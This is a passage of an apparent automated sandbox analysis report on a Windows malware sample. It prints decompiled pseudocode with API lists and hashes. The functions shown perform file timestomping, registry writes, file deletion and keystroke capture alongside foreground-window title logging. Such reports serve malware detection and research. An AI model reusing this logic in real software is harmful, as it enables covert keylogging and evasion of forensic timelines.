                                    							E240178EC(_v8);
                                    						}
                                    						_v8 = E240178C8(E240384FC, 0, 0);
                                    						Sleep(0x2710); // executed
                                    						_pop(_t105);
                                    						_pop(_t93);
                                    						 *[fs:eax] = _t105;
                                    						continue;
                                    					}
                                    					L8:
                                    					E24038298();
                                    					E24016910( &_v36, _t90, _t93);
                                    					_push(_v36);
                                    					_push(0x240384ec);
                                    					E240169B8( &_v40, _t90, _t93);
                                    					_push(_v40);
                                    					_push(0x240384ec);
                                    					E24016A60( &_v44, _t90, _t93);
                                    					_push(_v44);
                                    					E240133FC();
                                    					E24016634(_v12, _t90, _t109, _t110, _t116); // executed
                                    					_t65 = E24016C78(_v12, _t90, _t116); // executed
                                    					_t117 = _t65;
                                    					if(_t65 == 0) {
                                    						_t93 = E2401333C(_v16);
                                    						E24016DA0(_v12, _t90, _t82, _v16, _t110, _t117); // executed
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • Sleep.KERNEL32(00002710,?,240384EC,?,240384EC,?,00000000,240384A4,?,?,?,?,00000000,00000000), ref: 2403837F
                                    • GetTickCount.KERNEL32 ref: 240383F3
                                    • Sleep.KERNEL32(00002710,00000000,2403847A,?,?,240384EC,?,240384EC,?,00002710,?,240384EC,?,240384EC,?,00000000), ref: 24038468
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CountTick
                                    • String ID: XXXXXXXXXXXXXXXXXXXX$XxX.xXx
                                    • API String ID: 207069750-1553977181
                                    • Opcode ID: ab51557a76bb226ced445433c1b3410f09f3f9bddcd835e4c67328f055936099
                                    • Instruction ID: 25fc874d78c06795fbb0b37c2b756a1d7c84d9662aa74cad94cb20b382630e4b
                                    • Opcode Fuzzy Hash: ab51557a76bb226ced445433c1b3410f09f3f9bddcd835e4c67328f055936099
                                    • Instruction Fuzzy Hash: AF415232A04108AFFF01DBA4DC90A9EBFF9FF54708F5084B5E504A7658DA34AAC5CB19
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E24017666(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _FILETIME _v16;
                                    				void* _t22;
                                    				void* _t34;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t40);
                                    				_push(0x24017719);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t40 + 0xfffffff4;
                                    				_v16.dwLowDateTime = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_t22 = CreateFileA(E24013534(_v8), 0x40000000, 1, 0, 3, 0x2000000, 0); // executed
                                    				_t34 = _t22;
                                    				if(_t34 != 0xffffffff) {
                                    					SetFileTime(_t34, 0,  &_v16, 0); // executed
                                    					SetFileTime(_t34, 0, 0,  &_v16); // executed
                                    					SetFileTime(_t34,  &_v16, 0, 0); // executed
                                    				}
                                    				CloseHandle(_t34); // executed
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(E24017720);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176C7
                                    • SetFileTime.KERNEL32(00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176DC
                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000), ref: 240176EA
                                    • SetFileTime.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000), ref: 240176F8
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176FE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Time$CloseCreateHandle
                                    • String ID:
                                    • API String ID: 670991709-0
                                    • Opcode ID: a205142b3e9cca52833549056e572b61dc8a98cc8248461bd7ae84f243a364f1
                                    • Instruction ID: e1d9c7707ed24edee1f0e1315ea43de611d75778717480072af269c3e6269ac6
                                    • Opcode Fuzzy Hash: a205142b3e9cca52833549056e572b61dc8a98cc8248461bd7ae84f243a364f1
                                    • Instruction Fuzzy Hash: 6911A5B4A40304BFF711D774DC92F9E77ECDB58708F600461B618FA1C5DB74AA808A24
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E24017668(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _FILETIME _v16;
                                    				void* _t22;
                                    				void* _t34;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t40);
                                    				_push(0x24017719);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t40 + 0xfffffff4;
                                    				_v16.dwLowDateTime = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_t22 = CreateFileA(E24013534(_v8), 0x40000000, 1, 0, 3, 0x2000000, 0); // executed
                                    				_t34 = _t22;
                                    				if(_t34 != 0xffffffff) {
                                    					SetFileTime(_t34, 0,  &_v16, 0); // executed
                                    					SetFileTime(_t34, 0, 0,  &_v16); // executed
                                    					SetFileTime(_t34,  &_v16, 0, 0); // executed
                                    				}
                                    				CloseHandle(_t34); // executed
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(E24017720);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176C7
                                    • SetFileTime.KERNEL32(00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176DC
                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000), ref: 240176EA
                                    • SetFileTime.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000), ref: 240176F8
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176FE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Time$CloseCreateHandle
                                    • String ID:
                                    • API String ID: 670991709-0
                                    • Opcode ID: 56ded2460fc724d0f295d78eb3d18c500077e5e50686cf618aa8a6c10fa19445
                                    • Instruction ID: 659e7c2307cda926b955b05c49b93f7f10d92c8ba746da9942bafb788355387c
                                    • Opcode Fuzzy Hash: 56ded2460fc724d0f295d78eb3d18c500077e5e50686cf618aa8a6c10fa19445
                                    • Instruction Fuzzy Hash: 1311A5B4A40304BEF711D774DC92F9E77ECDB58708F600461B618FA1C5DB74AA808A24
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E240170B8(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _v20;
                                    				int _v24;
                                    				long _t35;
                                    				long _t46;
                                    				intOrPtr _t66;
                                    				void* _t72;
                                    				char* _t73;
                                    				void* _t76;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t72 = __eax;
                                    				_t60 = _a4;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				E24013524(_a8);
                                    				_push(_t76);
                                    				_push(0x24017197);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t76 + 0xffffffec;
                                    				E240130DC(_a4, _a8);
                                    				_t35 = RegOpenKeyExA(_t72, E24013534(_v8), 0, 1,  &_v16); // executed
                                    				if(_t35 == 0) {
                                    					_t73 = E24013534(_v12);
                                    					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
                                    					if(_t46 == 0) {
                                    						E240136BC(_t60, _v24);
                                    						RegQueryValueExA(_v16, _t73, 0,  &_v20, E24013534( *_t60),  &_v24); // executed
                                    						E240136BC(_t60, _v24 - 1);
                                    					}
                                    					RegCloseKey(_v16); // executed
                                    				}
                                    				_pop(_t66);
                                    				 *[fs:eax] = _t66;
                                    				_push(E2401719E);
                                    				E240130AC( &_v12, 2);
                                    				return E24013088( &_a8);
			}

                                    0x240170c0
                                    0x240170c3
                                    0x240170c6
                                    0x240170c8
                                    0x240170ce
                                    0x240170d6
                                    0x240170de
                                    0x240170e5
                                    0x240170e6
                                    0x240170eb
                                    0x240170ee
                                    0x240170f6
                                    0x2401710d
                                    0x24017114
                                    0x2401712a
                                    0x24017131
                                    0x24017138
                                    0x2401713f
                                    0x2401715b
                                    0x24017166
                                    0x24017166
                                    0x2401716f
                                    0x2401716f
                                    0x24017176
                                    0x24017179
                                    0x2401717c
                                    0x24017189
                                    0x24017196

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 2401710D
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 24017131
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 2401715B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197), ref: 2401716F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: ce6ba991ddf6a600ee6b0a027aa80988b8c85487e56726ec2176fdfdd9b6323b
                                    • Instruction ID: c756bbbe93056c70c21f8ba61cc9fe60dbc89fb361fcddfeaeb64842cabb1db9
                                    • Opcode Fuzzy Hash: ce6ba991ddf6a600ee6b0a027aa80988b8c85487e56726ec2176fdfdd9b6323b
                                    • Instruction Fuzzy Hash: 5821FF75A00508ABFF01DBA8DD91EAEB7FCEF58604F504165F518E7254D770EE448B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E24016CE4(char __eax, void* __ebx, intOrPtr __ecx, long* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				long _v16;
                                    				void* _t17;
                                    				void* _t23;
                                    				long* _t36;
                                    				intOrPtr _t42;
                                    				void* _t46;
                                    				void* _t51;
                                    				void* _t53;
                                    
                                    				_t53 = __eflags;
                                    				_push(__ebx);
                                    				_v12 = __ecx;
                                    				_t36 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t51);
                                    				_push(0x24016d92);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51 + 0xfffffff4;
                                    				E24013088(_v12);
                                    				_t17 = E24016C78(_v8, _t36, _t53); // executed
                                    				_t54 = _t17;
                                    				if(_t17 != 0) {
                                    					_t23 = CreateFileA(E24013534(_v8), 0x80000000, 1, 0, 3, 0, 0); // executed
                                    					_t46 = _t23;
                                    					 *_t36 = GetFileSize(_t46, 0);
                                    					_t48 = E24011344( *_t36);
                                    					ReadFile(_t46, _t26,  *_t36,  &_v16, 0); // executed
                                    					E24013174(_v12,  *_t36, _t48, _t54);
                                    					E2401135C(_t48);
                                    					CloseHandle(_t46); // executed
                                    				}
                                    				_pop(_t42);
                                    				 *[fs:eax] = _t42;
                                    				_push(E24016D99);
                                    				return E24013088( &_v8);
			}

                                    0x24016ce4
                                    0x24016cea
                                    0x24016ced
                                    0x24016cf0
                                    0x24016cf2
                                    0x24016cf8
                                    0x24016cff
                                    0x24016d00
                                    0x24016d05
                                    0x24016d08
                                    0x24016d0e
                                    0x24016d16
                                    0x24016d1b
                                    0x24016d1d
                                    0x24016d37
                                    0x24016d3c
                                    0x24016d46
                                    0x24016d4f
                                    0x24016d5c
                                    0x24016d68
                                    0x24016d71
                                    0x24016d77
                                    0x24016d77
                                    0x24016d7e
                                    0x24016d81
                                    0x24016d84
                                    0x24016d91

                                    APIs
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,24016D92,?,?,?,00000000), ref: 24016D37
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,24016D92,?,?,?,00000000), ref: 24016D41
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,24016D92), ref: 24016D5C
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 24016D77
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseFind$CreateFirstHandleReadSize
                                    • String ID:
                                    • API String ID: 2300874643-0
                                    • Opcode ID: c152adff0e670b4cefb6603cfd2a00a3328a8aa5145a76ecf437b271950dc9b2
                                    • Instruction ID: 8b64a34a4713e86c3cbc782a42c4c394800181e4e0682710792d5f4154c7fdd8
                                    • Opcode Fuzzy Hash: c152adff0e670b4cefb6603cfd2a00a3328a8aa5145a76ecf437b271950dc9b2
                                    • Instruction Fuzzy Hash: F6113070A00604BFFB11DBA4CC91F6E7BF8DF5AB08F5000A4F508EB298DA706E419655
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E24016DA0(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				long _v16;
                                    				void* _t17;
                                    				void* _t28;
                                    				intOrPtr _t33;
                                    				long _t36;
                                    				void* _t39;
                                    
                                    				_t36 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				_push(_t39);
                                    				_push(0x24016e3a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t39 + 0xfffffff4;
                                    				_t17 = CreateFileA(E24013534(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
                                    				_t28 = _t17;
                                    				if(_t28 != 0xffffffff) {
                                    					if(_t36 == 0xffffffff) {
                                    						SetFilePointer(_t28, 0, 0, 0);
                                    					}
                                    					WriteFile(_t28, E24013588( &_v12), _t36,  &_v16, 0); // executed
                                    					CloseHandle(_t28); // executed
                                    				}
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E24016E41);
                                    				return E240130AC( &_v12, 2);
			}

                                    0x24016da8
                                    0x24016daa
                                    0x24016dad
                                    0x24016db3
                                    0x24016dbb
                                    0x24016dc2
                                    0x24016dc3
                                    0x24016dc8
                                    0x24016dcb
                                    0x24016de6
                                    0x24016deb
                                    0x24016df0
                                    0x24016df5
                                    0x24016dfe
                                    0x24016dfe
                                    0x24016e14
                                    0x24016e1a
                                    0x24016e1a
                                    0x24016e21
                                    0x24016e24
                                    0x24016e27
                                    0x24016e39

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A,?,2406330C,00000000), ref: 24016DE6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A,?,2406330C,00000000), ref: 24016DFE
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A,?,2406330C), ref: 24016E14
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A), ref: 24016E1A
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 9c10716a017262dec08191e6d730ba0fda94126424136afbece318bd25122b54
                                    • Instruction ID: 5e14e521d40f77ff0ffafe4323b17e38724db65e878e450249dc7196e2eec2cc
                                    • Opcode Fuzzy Hash: 9c10716a017262dec08191e6d730ba0fda94126424136afbece318bd25122b54
                                    • Instruction Fuzzy Hash: E711D670A003047BFB10D7B4DC92F9EBAECDB55B28F600661B518F71D4DAB06E808554
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24038260(struct tagMSG* __eax) {
                                    				int _t3;
                                    				int _t7;
                                    				MSG* _t8;
                                    
                                    				_t8 = __eax;
                                    				_t7 = 0;
                                    				_t3 = PeekMessageA(__eax, 0, 0, 0, 1); // executed
                                    				if(_t3 != 0) {
                                    					_t7 = 1;
                                    					if(_t8->message != 0x12) {
                                    						TranslateMessage(_t8);
                                    						DispatchMessageA(_t8);
                                    					}
                                    				}
                                    				Sleep(0x14); // executed
                                    				return _t7;
			}

                                    0x24038262
                                    0x24038264
                                    0x2403826f
                                    0x24038276
                                    0x24038278
                                    0x2403827e
                                    0x24038281
                                    0x24038287
                                    0x24038287
                                    0x2403827e
                                    0x2403828e
                                    0x24038297

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 2403826F
                                    • TranslateMessage.USER32 ref: 24038281
                                    • DispatchMessageA.USER32 ref: 24038287
                                    • Sleep.KERNEL32(00000014,?,2405B9C4,240382A2), ref: 2403828E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: 5b8e39013756ac92f66ab1ed471163146afefbc0c30940ddccd909afdcd235f4
                                    • Instruction ID: 26f70061a20bdd4f842552a75aa6ff1f1e3d90af3555c4690711033c8d8bbf7d
                                    • Opcode Fuzzy Hash: 5b8e39013756ac92f66ab1ed471163146afefbc0c30940ddccd909afdcd235f4
                                    • Instruction Fuzzy Hash: DDE05E32382B303AFB6166A40C82FDF6AC84F22B8EF544175F709BF0C4C6D1598042AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E24016634(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v9;
                                    				void* _t13;
                                    				int _t24;
                                    				intOrPtr _t36;
                                    				intOrPtr _t37;
                                    				CHAR* _t40;
                                    				void* _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				void* _t45;
                                    
                                    				_t45 = __eflags;
                                    				_t42 = _t43;
                                    				_t44 = _t43 + 0xfffffff8;
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t42);
                                    				_push(0x240166d3);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t44;
                                    				_v9 = 0;
                                    				_t13 = E24016C78(_v8, __ebx, _t45); // executed
                                    				if(_t13 != 0) {
                                    					_push(_t42);
                                    					_push(0x240166b3);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					_t40 = E24013534(_v8);
                                    					GetFileAttributesA(_t40); // executed
                                    					SetFileAttributesA(_t40, 0); // executed
                                    					_t24 = DeleteFileA(_t40); // executed
                                    					asm("sbb eax, eax");
                                    					_v9 = _t24 + 1;
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    				}
                                    				_pop(_t36);
                                    				 *[fs:eax] = _t36;
                                    				_push(E240166DA);
                                    				return E24013088( &_v8);
			}

                                    0x24016634
                                    0x24016635
                                    0x24016637
                                    0x2401663a
                                    0x2401663d
                                    0x24016643
                                    0x2401664a
                                    0x2401664b
                                    0x24016650
                                    0x24016653
                                    0x24016656
                                    0x2401665d
                                    0x24016664
                                    0x24016668
                                    0x24016669
                                    0x2401666e
                                    0x24016671
                                    0x2401667c
                                    0x2401667f
                                    0x24016695
                                    0x2401669b
                                    0x240166a3
                                    0x240166a6
                                    0x240166ab
                                    0x240166ae
                                    0x240166ae
                                    0x240166bf
                                    0x240166c2
                                    0x240166c5
                                    0x240166d2

                                    APIs
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,240166B3,?,00000000,240166D3,?,?,?,2405B97C), ref: 2401667F
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,240166B3,?,00000000,240166D3,?,?,?,2405B97C), ref: 24016695
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,240166B3,?,00000000,240166D3,?,?,?,2405B97C), ref: 2401669B
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: a2760cd4d22ede524bd63032f08b60f7a1757eb047a1e1b3cb63d1959e79f28f
                                    • Instruction ID: 0f868d49b0c4ac7066a788b533986eed2bc62b926bd6142e2be0c5c97462f51a
                                    • Opcode Fuzzy Hash: a2760cd4d22ede524bd63032f08b60f7a1757eb047a1e1b3cb63d1959e79f28f
                                    • Instruction Fuzzy Hash: C4116631614244AFFB02CBB4DC21A9FBBECDB2AA08F5208B4E808D2640D6755F50C961
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E24016858(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, char _a4) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _t28;
                                    				char* _t30;
                                    				long _t34;
                                    				intOrPtr _t49;
                                    				void* _t52;
                                    				void* _t55;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t52 = __eax;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				E24013524(_a4);
                                    				_push(_t55);
                                    				_push(0x240168fd);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t55 + 0xfffffff4;
                                    				RegCreateKeyA(_t52, E24013534(_v8),  &_v16); // executed
                                    				_t28 = E2401333C(_a4);
                                    				_t30 = E24013534(_a4);
                                    				_t34 = RegSetValueExA(_v16, E24013534(_v12), 0, 2, _t30, _t28); // executed
                                    				if(_t34 == 0) {
                                    				}
                                    				RegCloseKey(_v16); // executed
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E24016904);
                                    				E240130AC( &_v12, 2);
                                    				return E24013088( &_a4);
                                    			}

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 2401689E
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168C6
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168D5
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 7d43796703afa1c0fbfd6100e6e37c697ad78559f9aa42f935fc15b08382d96c
                                    • Instruction ID: 9243f166b6b1c28704da6bdfb96b9cc77dd8544df6249d0cfac429592347df8f
                                    • Opcode Fuzzy Hash: 7d43796703afa1c0fbfd6100e6e37c697ad78559f9aa42f935fc15b08382d96c
                                    • Instruction Fuzzy Hash: 9111ECB5900108BFFF01EBA8DD91E9EBBECAF18648F5144A5B808E7254DA709E818A50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 74%
                                    			E24052464() {
                                    				char _v8;
                                    				intOrPtr _v36;
                                    				long _t11;
                                    				void* _t12;
                                    				long _t21;
                                    				void* _t22;
                                    				intOrPtr* _t34;
                                    				void* _t37;
                                    
                                    				_push(0);
                                    				_push(_t21);
                                    				_push(0x2405250d);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t34;
                                    				while(1) {
                                    					Sleep(1); // executed
                                    					E2401794C( &_v8, _t21, _t22, 0x24063304, 0x2406330c); // executed
                                    					E240130DC(0x2406330c, _v8);
                                    					E2405038C(_t21, 0x24063304, 0x2406330c);
                                    					_t11 = GetTickCount();
                                    					_push(0);
                                    					_push(_t11);
                                    					_t3 = _t21 + 0x12c; // 0x12c
                                    					_t12 = _t3;
                                    					asm("cdq");
                                    					if(0 != _v36) {
                                    						goto L4;
                                    					}
                                    					L2:
                                    					_t37 = _t12 -  *_t34;
                                    					if(_t37 >= 0) {
                                    						continue;
                                    					} else {
                                    						L5:
                                    						E24013480( *0x24063304,  *0x2406330c);
                                    						if(_t37 != 0) {
                                    							_t38 =  *0x24063308 - 1;
                                    							if( *0x24063308 == 1) {
                                    								E24052240(_t21, 0x24063304, 0x2406330c, _t38);
                                    								 *0x24063308 = 0;
                                    							}
                                    							E240130DC(0x24063304,  *0x2406330c);
                                    							_t21 = GetTickCount();
                                    						}
                                    						while(1) {
                                    							Sleep(1); // executed
                                    							E2401794C( &_v8, _t21, _t22, 0x24063304, 0x2406330c); // executed
                                    							E240130DC(0x2406330c, _v8);
                                    							E2405038C(_t21, 0x24063304, 0x2406330c);
                                    							_t11 = GetTickCount();
                                    							_push(0);
                                    							_push(_t11);
                                    							_t3 = _t21 + 0x12c; // 0x12c
                                    							_t12 = _t3;
                                    							asm("cdq");
                                    							if(0 != _v36) {
                                    								goto L4;
                                    							}
                                    							goto L2;
                                    						}
                                    					}
                                    					L4:
                                    					if(__eflags >= 0) {
                                    						continue;
                                    					}
                                    					goto L5;
                                    				}
                                    			}

                                    APIs
                                    • Sleep.KERNEL32(00000001,00000000,2405250D,?,?,?,?,00000000), ref: 24052486
                                      • Part of subcall function 2401794C: GetForegroundWindow.USER32(00000000,240179B9,?,24063304,2406330C,?,00000000,?,24052493,00000001,00000000,2405250D), ref: 2401796B
                                      • Part of subcall function 2401794C: GetWindowTextLengthA.USER32(00000000), ref: 24017977
                                      • Part of subcall function 2401794C: GetWindowTextA.USER32(00000000,00000000,00000001), ref: 24017994
                                      • Part of subcall function 2405038C: GetAsyncKeyState.USER32(00000008), ref: 240503C9
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000014), ref: 240503EC
